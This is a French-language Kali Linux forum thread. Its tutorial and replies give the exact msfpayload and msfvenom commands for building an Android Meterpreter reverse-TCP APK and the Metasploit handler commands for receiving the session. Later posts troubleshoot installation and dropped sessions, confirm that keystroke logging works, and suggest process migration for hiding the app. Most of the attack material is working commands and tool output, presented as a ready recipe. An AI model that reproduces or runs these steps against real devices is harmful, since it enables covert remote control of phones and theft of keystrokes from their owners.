Vous n'êtes pas identifié(e).
1. sous Kali Linux, ouvrez un terminal et tapez:
msfpayload android/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 R > app.apk
Une fois le fichier créer faite un ls pour vérifier sa présence et installez le sur votre appareil android de test.
Ensuite lancez une console metasploit
msfconsole
Ensuite tapez ces commandes :
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost <ip> (entrez votre ip Kali)
set lport 4444
Plus qu'a taper:
exploit
Une fois la session meterpreter lancée, il vous suffira de taper sysinfo pour obtenir des information et ps pour voir la liste des processus en cours.
Source:
Utiliser des logiciels propriétaires, c'est comme les plats préparés, on est incapable de dire les conservateurs qu'ils contiennent, on dira toujours que c'est bon, mais ça ne remplacera jamais le repas fait maison par sa maman.
]:D #! Crunchbang & Archlinux GNU/Linux User ]:D
Hors ligne
Et sa peut nous apporter quoi d'autre ?
La commande keyscan_start est elle possible ?
L'application sera elle cacher dans la liste d'application instaler ?
Dernière modification par Dudule100 (23-02-2015 21:01:12)
En théorie sa marche, en pratique c'est autre chose ! ^^
Hors ligne
Rien de plus qu'une autre session meterpreter, la fonction keyscan est possible une fois la session meterpreter ouverte.
Pour ta dernière question, il faut te renseigner sur migrate et faire des test, je n'ai pas trop d'expérience avec metasploit, j'ai simplement fais quelques test.
Utiliser des logiciels propriétaires, c'est comme les plats préparés, on est incapable de dire les conservateurs qu'ils contiennent, on dira toujours que c'est bon, mais ça ne remplacera jamais le repas fait maison par sa maman.
]:D #! Crunchbang & Archlinux GNU/Linux User ]:D
Hors ligne
A savoir que ça va migrer sous msfvenom dans peu de temps ( pour juin je crois )
Mess With The Bests
Die Like The Rest
Hors ligne
Ok merci bien de vos réponses, je ne connais pas trop non, plus, j'apprend (je suis débutant) !
En théorie sa marche, en pratique c'est autre chose ! ^^
Hors ligne
J'utilise trés souvent cet exploit. Mais depuis le déploiement de android lollipop la session meterpreter ce ferme au bout de quelques secondes. Suis-je le seul ou vous aussi ça vous arrive ?
Et depuis la mise en place de msfvenom quelqu'un arrive t'il a créer le fichier.apk ? car au moment de donner l'extension a msfvenom le retour de la commande est "format Introuvable" si quelqu'un à la bonne commande cela serait super cool
Merci d'avance.
the quieter you become the more you are able to hear
Hors ligne
Pour creé un payload avec msfvnom tu tape "msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.26 -o Desktop/app.apk" tester et fonctionnel
Hors ligne
Ok super merci pour la commande. a suivre pour le probleme de la session qui ce coupe toute seule. Si quelqu'un a la soluce aussi je suis preneur
the quieter you become the more you are able to hear
Hors ligne
lorsque je te tape la commande : msfpayload android/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 R > app.apk ..... dans le terminal et je valide , j'ai la réponse suivante : bash: msfpayload : commande introuvable , qu'est ce que ça veut dire ?
Hors ligne
lorsque je te tape la commande : msfpayload android/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 R > app.apk ..... dans le terminal et je valide , j'ai la réponse suivante : bash: msfpayload : commande introuvable , qu'est ce que ça veut dire ?
Qu'il faut lire la doc..
msfpayload est devenu msfvenom, c'est pas comme si c'était pas indiqué partout.
Utiliser des logiciels propriétaires, c'est comme les plats préparés, on est incapable de dire les conservateurs qu'ils contiennent, on dira toujours que c'est bon, mais ça ne remplacera jamais le repas fait maison par sa maman.
]:D #! Crunchbang & Archlinux GNU/Linux User ]:D
Hors ligne
merci pour ta réponse , c'est nouveau pour moi , je sais que je vais galérer un peu
Hors ligne
Surtout que Hacker-Fl0w avait donné la soluce juste 2 poste plus haut, il faut lire le fil de la discussion.
Utiliser des logiciels propriétaires, c'est comme les plats préparés, on est incapable de dire les conservateurs qu'ils contiennent, on dira toujours que c'est bon, mais ça ne remplacera jamais le repas fait maison par sa maman.
]:D #! Crunchbang & Archlinux GNU/Linux User ]:D
Hors ligne
Pour creé un payload avec msfvnom tu tape "msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.26 -o Desktop/app.apk" tester et fonctionnel
merci beaucoup
Hors ligne
J'utilise trés souvent cet exploit. Mais depuis le déploiement de android lollipop la session meterpreter ce ferme au bout de quelques secondes. Suis-je le seul ou vous aussi ça vous arrive ?
Et depuis la mise en place de msfvenom quelqu'un arrive t'il a créer le fichier.apk ? car au moment de donner l'extension a msfvenom le retour de la commande est "format Introuvable" si quelqu'un à la bonne commande cela serait super cool
Merci d'avance.
tu n'es pas le seul , on est deux , pour moi aussi la session meterpreter se ferme au bout de quelques secondes
Hors ligne
Merci pour la petite commande, j'ai pu l'utiliser pour faire le petit fou avec nethunter ( installé sur un Nexus 5) . Très très fun même si je ne sais pas encore exploiter ce genre de choses correctement
Security is always excessive until it’s not enough. — Robbie Sinclair
Hors ligne
Merci pour ce tuto,
Mon payload est fait et je l'ai envoyé sur mon portable test.
Mais main activity d'android ne veut pas me l'installer "Application non installée".
Quand je fais la première commande, j'ai ce résultat :
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.23 LPORT=4444 -o Bureau/app.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8493 bytes
Saved as: Bureau/app.apk
Est-ce que ça change quelque chose ?
Avez vous la solution pour que mon payload s'installe ?
Merci
Hors ligne
Le tuto est pour une ancienne version de metasploit, tu utilises msfvenom, et les messages concernant l'architecture et la plateforme utilisée sont expliqué dans un autre tutoriel.
Quand à l'apk il faut vérifier que le payload soit compatible avec ta version d'android, par exemple elle peut ne pas s'installer sur une lollipop et fonctionner sur une Ginger.
Utiliser des logiciels propriétaires, c'est comme les plats préparés, on est incapable de dire les conservateurs qu'ils contiennent, on dira toujours que c'est bon, mais ça ne remplacera jamais le repas fait maison par sa maman.
]:D #! Crunchbang & Archlinux GNU/Linux User ]:D
Hors ligne
Merci, je vais me renseigner en ce qui concerne l'architecture, mais est ce que ce message à un impact sur la fonctionnalité de mon payload ?
j'ai essayé pas mal de tuto sur ma version kali linux 2.0 mais ça ne fonctionne pas, j'ai presque envie de mettre une version antérieur de ce système pour que vos tuto qui sont très bien détaillés fonctionnent.
la version d'android sur mon téléphone c'est la 4.1.2 Jelly Bean
Dernière modification par krigg (31-10-2015 12:17:11)
Hors ligne